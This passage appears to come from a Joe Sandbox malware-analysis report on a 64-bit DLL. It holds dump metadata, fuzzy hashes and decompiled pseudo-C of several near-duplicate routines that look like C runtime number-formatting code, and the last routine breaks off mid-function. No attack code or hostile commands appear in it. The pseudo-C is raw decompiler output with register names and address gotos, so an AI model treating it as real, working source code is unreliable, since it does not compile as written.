                                                                      0x18001f48d
                                                                      0x18001f495
                                                                      0x18001f4a5
                                                                      0x18001f4ac
                                                                      0x18001f4b4
                                                                      0x18001f4b6
                                                                      0x18001f4ba
                                                                      0x18001f4be
                                                                      0x18001f4c8
                                                                      0x18001f4cd
                                                                      0x18001f4d2
                                                                      0x18001f4d6
                                                                      0x18001f4e3
                                                                      0x18001f4ee
                                                                      0x18001f4f7
                                                                      0x18001f4f9
                                                                      0x18001f502
                                                                      0x18001f505
                                                                      0x18001f51e

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 80ab7e812c43dcc5dcfa23f8554693d02f5d7dfe15975562af0530b32900f834
                                                                      • Instruction ID: 6c21182014f25466116b8d7c468665fbb8ead4684ae794e0a00471ffdfcda0e6
                                                                      • Opcode Fuzzy Hash: 80ab7e812c43dcc5dcfa23f8554693d02f5d7dfe15975562af0530b32900f834
                                                                      • Instruction Fuzzy Hash: DF51BF73600E5883E7BA8F28C0543BD27A1E359BA8F148219EF55177D9CF24DE86C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001F520(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x8001f607;
                                                                      				if (_t111 == 0) goto 0x8001f570;
                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x8001f65b;
                                                                      				if (_t112 == 0) goto 0x8001f5df;
                                                                      				if (_t112 == 0) goto 0x8001f5b8;
                                                                      				if (_t112 == 0) goto 0x8001f65b;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x8001f627;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x8001f5a2;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001f5a2;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001f686;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001f69d;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001f5d9;
                                                                      				goto 0x8001f58b;
                                                                      				goto 0x8001f58b;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x8001f601;
                                                                      				goto 0x8001f58b;
                                                                      				goto 0x8001f58b;
                                                                      				if (_t119 == 0) goto 0x8001f570;
                                                                      				if (_t119 == 0) goto 0x8001f570;
                                                                      				if (_t119 == 0) goto 0x8001f570;
                                                                      				goto 0x8001f55e;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001f6f6;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001f67e;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x8001f58b;
                                                                      				goto 0x8001f58b;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E000000011800167C4(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x8001f6a6;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x8001f6c0;
                                                                      				E00000001180022474(0, _t134, _t150);
                                                                      				goto 0x8001f6c7;
                                                                      				E00000001180020EB4( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134);
                                                                      				if (0 == 0) goto 0x8001f6f4;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x8001f6e5;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x8001f6f4;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}














                                                                      0x18001f520
                                                                      0x18001f525
                                                                      0x18001f52a
                                                                      0x18001f534
                                                                      0x18001f537
                                                                      0x18001f53a
                                                                      0x18001f53d
                                                                      0x18001f540
                                                                      0x18001f546
                                                                      0x18001f548
                                                                      0x18001f54a
                                                                      0x18001f553
                                                                      0x18001f55c
                                                                      0x18001f561
                                                                      0x18001f56a
                                                                      0x18001f570
                                                                      0x18001f578
                                                                      0x18001f592
                                                                      0x18001f597
                                                                      0x18001f59f
                                                                      0x18001f5a6
                                                                      0x18001f5ac
                                                                      0x18001f5b3
                                                                      0x18001f5c0
                                                                      0x18001f5d0
                                                                      0x18001f5d7
                                                                      0x18001f5dd
                                                                      0x18001f5e7
                                                                      0x18001f5f1
                                                                      0x18001f5f8
                                                                      0x18001f5ff
                                                                      0x18001f605
                                                                      0x18001f60a
                                                                      0x18001f613
                                                                      0x18001f61c
                                                                      0x18001f622
                                                                      0x18001f627
                                                                      0x18001f62b
                                                                      0x18001f62e
                                                                      0x18001f635
                                                                      0x18001f639
                                                                      0x18001f644
                                                                      0x18001f649
                                                                      0x18001f64f
                                                                      0x18001f656
                                                                      0x18001f663
                                                                      0x18001f673
                                                                      0x18001f675
                                                                      0x18001f679
                                                                      0x18001f681
                                                                      0x18001f691
                                                                      0x18001f698
                                                                      0x18001f6a0
                                                                      0x18001f6a2
                                                                      0x18001f6a6
                                                                      0x18001f6aa
                                                                      0x18001f6b4
                                                                      0x18001f6b9
                                                                      0x18001f6be
                                                                      0x18001f6c2
                                                                      0x18001f6cf
                                                                      0x18001f6da
                                                                      0x18001f6e3
                                                                      0x18001f6e5
                                                                      0x18001f6ee
                                                                      0x18001f6f1
                                                                      0x18001f70a

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 043b2fd71d1d33525240d55cab4ceddd918ac8add6b994a18b14806599dcccce
                                                                      • Instruction ID: 1ba7bc8e52bddd33a99167fc6073ce11e5009d83e8b32080b87c2086df3c56d4
                                                                      • Opcode Fuzzy Hash: 043b2fd71d1d33525240d55cab4ceddd918ac8add6b994a18b14806599dcccce
                                                                      • Instruction Fuzzy Hash: 44519077600E5882E7BA8F29C1543BC27A1E358BE8F158215EF4A177E9CF21CE49C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E0000000118001D710(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      				void* _t159;
                                                                      
                                                                      				_t159 = __r10;
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x8001d7f7;
                                                                      				if (_t111 == 0) goto 0x8001d760;
                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x8001d84b;
                                                                      				if (_t112 == 0) goto 0x8001d7cf;
                                                                      				if (_t112 == 0) goto 0x8001d7a8;
                                                                      				if (_t112 == 0) goto 0x8001d84b;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x8001d817;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x8001d792;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001d792;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001d876;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001d88d;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001d7c9;
                                                                      				goto 0x8001d77b;
                                                                      				goto 0x8001d77b;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x8001d7f1;
                                                                      				goto 0x8001d77b;
                                                                      				goto 0x8001d77b;
                                                                      				if (_t119 == 0) goto 0x8001d760;
                                                                      				if (_t119 == 0) goto 0x8001d760;
                                                                      				if (_t119 == 0) goto 0x8001d760;
                                                                      				goto 0x8001d74e;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001d8e6;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001d86e;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x8001d77b;
                                                                      				goto 0x8001d77b;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E000000011800167C4(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x8001d896;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x8001d8b0;
                                                                      				E00000001180021AC0(_t134, _t150);
                                                                      				goto 0x8001d8b7;
                                                                      				E00000001180020530( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134, _t150, _t159);
                                                                      				if (0 == 0) goto 0x8001d8e4;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x8001d8d5;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x8001d8e4;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}















                                                                      0x18001d710
                                                                      0x18001d710
                                                                      0x18001d715
                                                                      0x18001d71a
                                                                      0x18001d724
                                                                      0x18001d727
                                                                      0x18001d72a
                                                                      0x18001d72d
                                                                      0x18001d730
                                                                      0x18001d736
                                                                      0x18001d738
                                                                      0x18001d73a
                                                                      0x18001d743
                                                                      0x18001d74c
                                                                      0x18001d751
                                                                      0x18001d75a
                                                                      0x18001d760
                                                                      0x18001d768
                                                                      0x18001d782
                                                                      0x18001d787
                                                                      0x18001d78f
                                                                      0x18001d796
                                                                      0x18001d79c
                                                                      0x18001d7a3
                                                                      0x18001d7b0
                                                                      0x18001d7c0
                                                                      0x18001d7c7
                                                                      0x18001d7cd
                                                                      0x18001d7d7
                                                                      0x18001d7e1
                                                                      0x18001d7e8
                                                                      0x18001d7ef
                                                                      0x18001d7f5
                                                                      0x18001d7fa
                                                                      0x18001d803
                                                                      0x18001d80c
                                                                      0x18001d812
                                                                      0x18001d817
                                                                      0x18001d81b
                                                                      0x18001d81e
                                                                      0x18001d825
                                                                      0x18001d829
                                                                      0x18001d834
                                                                      0x18001d839
                                                                      0x18001d83f
                                                                      0x18001d846
                                                                      0x18001d853
                                                                      0x18001d863
                                                                      0x18001d865
                                                                      0x18001d869
                                                                      0x18001d871
                                                                      0x18001d881
                                                                      0x18001d888
                                                                      0x18001d890
                                                                      0x18001d892
                                                                      0x18001d896
                                                                      0x18001d89a
                                                                      0x18001d8a4
                                                                      0x18001d8a9
                                                                      0x18001d8ae
                                                                      0x18001d8b2
                                                                      0x18001d8bf
                                                                      0x18001d8ca
                                                                      0x18001d8d3
                                                                      0x18001d8d5
                                                                      0x18001d8de
                                                                      0x18001d8e1
                                                                      0x18001d8fa

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4feb7d71f85bcb817ff961474ca37d8d5a9a029f3b4e9750e750b82ee06cd15a
                                                                      • Instruction ID: 11b1d2ddfc0b5391212acb86ed9de4275721368d8079671ea2b95b2f4af9d563
                                                                      • Opcode Fuzzy Hash: 4feb7d71f85bcb817ff961474ca37d8d5a9a029f3b4e9750e750b82ee06cd15a
                                                                      • Instruction Fuzzy Hash: 2E51B177604E5C82E7AA8F28C1543AC37A0E759BE8F148116EF06177D8EF20DE49C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001F93C(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x8001fa23;
                                                                      				if (_t111 == 0) goto 0x8001f98c;
                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x8001fa77;
                                                                      				if (_t112 == 0) goto 0x8001f9fb;
                                                                      				if (_t112 == 0) goto 0x8001f9d4;
                                                                      				if (_t112 == 0) goto 0x8001fa77;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x8001fa43;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x8001f9be;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001f9be;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001faa2;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001fab9;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001f9f5;
                                                                      				goto 0x8001f9a7;
                                                                      				goto 0x8001f9a7;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x8001fa1d;
                                                                      				goto 0x8001f9a7;
                                                                      				goto 0x8001f9a7;
                                                                      				if (_t119 == 0) goto 0x8001f98c;
                                                                      				if (_t119 == 0) goto 0x8001f98c;
                                                                      				if (_t119 == 0) goto 0x8001f98c;
                                                                      				goto 0x8001f97a;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001fb12;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001fa9a;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x8001f9a7;
                                                                      				goto 0x8001f9a7;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E000000011800167C4(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x8001fac2;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x8001fadc;
                                                                      				E000000011800225BC(0, _t134, _t150);
                                                                      				goto 0x8001fae3;
                                                                      				E00000001180020FFC( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134);
                                                                      				if (0 == 0) goto 0x8001fb10;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x8001fb01;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x8001fb10;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}














                                                                      0x18001f93c
                                                                      0x18001f941
                                                                      0x18001f946
                                                                      0x18001f950
                                                                      0x18001f953
                                                                      0x18001f956
                                                                      0x18001f959
                                                                      0x18001f95c
                                                                      0x18001f962
                                                                      0x18001f964
                                                                      0x18001f966
                                                                      0x18001f96f
                                                                      0x18001f978
                                                                      0x18001f97d
                                                                      0x18001f986
                                                                      0x18001f98c
                                                                      0x18001f994
                                                                      0x18001f9ae
                                                                      0x18001f9b3
                                                                      0x18001f9bb
                                                                      0x18001f9c2
                                                                      0x18001f9c8
                                                                      0x18001f9cf
                                                                      0x18001f9dc
                                                                      0x18001f9ec
                                                                      0x18001f9f3
                                                                      0x18001f9f9
                                                                      0x18001fa03
                                                                      0x18001fa0d
                                                                      0x18001fa14
                                                                      0x18001fa1b
                                                                      0x18001fa21
                                                                      0x18001fa26
                                                                      0x18001fa2f
                                                                      0x18001fa38
                                                                      0x18001fa3e
                                                                      0x18001fa43
                                                                      0x18001fa47
                                                                      0x18001fa4a
                                                                      0x18001fa51
                                                                      0x18001fa55
                                                                      0x18001fa60
                                                                      0x18001fa65
                                                                      0x18001fa6b
                                                                      0x18001fa72
                                                                      0x18001fa7f
                                                                      0x18001fa8f
                                                                      0x18001fa91
                                                                      0x18001fa95
                                                                      0x18001fa9d
                                                                      0x18001faad
                                                                      0x18001fab4
                                                                      0x18001fabc
                                                                      0x18001fabe
                                                                      0x18001fac2
                                                                      0x18001fac6
                                                                      0x18001fad0
                                                                      0x18001fad5
                                                                      0x18001fada
                                                                      0x18001fade
                                                                      0x18001faeb
                                                                      0x18001faf6
                                                                      0x18001faff
                                                                      0x18001fb01
                                                                      0x18001fb0a
                                                                      0x18001fb0d
                                                                      0x18001fb26

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c8e6c52686986896f7e8c3bb9133273151c2169da2917d4da830721c1a1c860b
                                                                      • Instruction ID: 6659c5b4af3fab5581f7cef54b4541b915e5f2608d3de7041eba3acf18e9430b
                                                                      • Opcode Fuzzy Hash: c8e6c52686986896f7e8c3bb9133273151c2169da2917d4da830721c1a1c860b
                                                                      • Instruction Fuzzy Hash: DA51CE73614E5882E7BA9F28C0543BC27A0E749BA8F148219EE4A177D9CF35CE49C781
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E0000000118001DB2C(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      				void* _t159;
                                                                      
                                                                      				_t159 = __r10;
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x8001dc13;
                                                                      				if (_t111 == 0) goto 0x8001db7c;
                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x8001dc67;
                                                                      				if (_t112 == 0) goto 0x8001dbeb;
                                                                      				if (_t112 == 0) goto 0x8001dbc4;
                                                                      				if (_t112 == 0) goto 0x8001dc67;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x8001dc33;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x8001dbae;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001dbae;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001dc92;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001dca9;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001dbe5;
                                                                      				goto 0x8001db97;
                                                                      				goto 0x8001db97;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x8001dc0d;
                                                                      				goto 0x8001db97;
                                                                      				goto 0x8001db97;
                                                                      				if (_t119 == 0) goto 0x8001db7c;
                                                                      				if (_t119 == 0) goto 0x8001db7c;
                                                                      				if (_t119 == 0) goto 0x8001db7c;
                                                                      				goto 0x8001db6a;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
